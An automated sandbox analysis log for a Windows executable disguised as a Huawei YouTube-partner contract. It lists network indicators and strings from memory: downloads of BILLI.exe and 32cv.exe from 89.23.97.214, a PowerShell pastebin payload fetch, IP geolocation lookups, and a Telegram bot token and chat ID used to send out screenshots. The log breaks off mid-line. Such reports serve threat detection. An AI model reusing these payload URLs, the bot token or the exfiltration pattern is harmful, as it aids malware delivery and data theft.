Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd"Content-Length: 694321
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/Team/32cv.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/Team/32cv.exe:
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/Team/BILLI.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/Team/BILLI.exe:
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754083000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgx
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189x
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/P
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/
Source: powershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2198121281.00000224015DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2450396016.0000020D20A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?GetWindowsDirectory
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/winforms-warnings/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessagechat_id-464240
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-464240
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247337256.000002B7E6560000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for 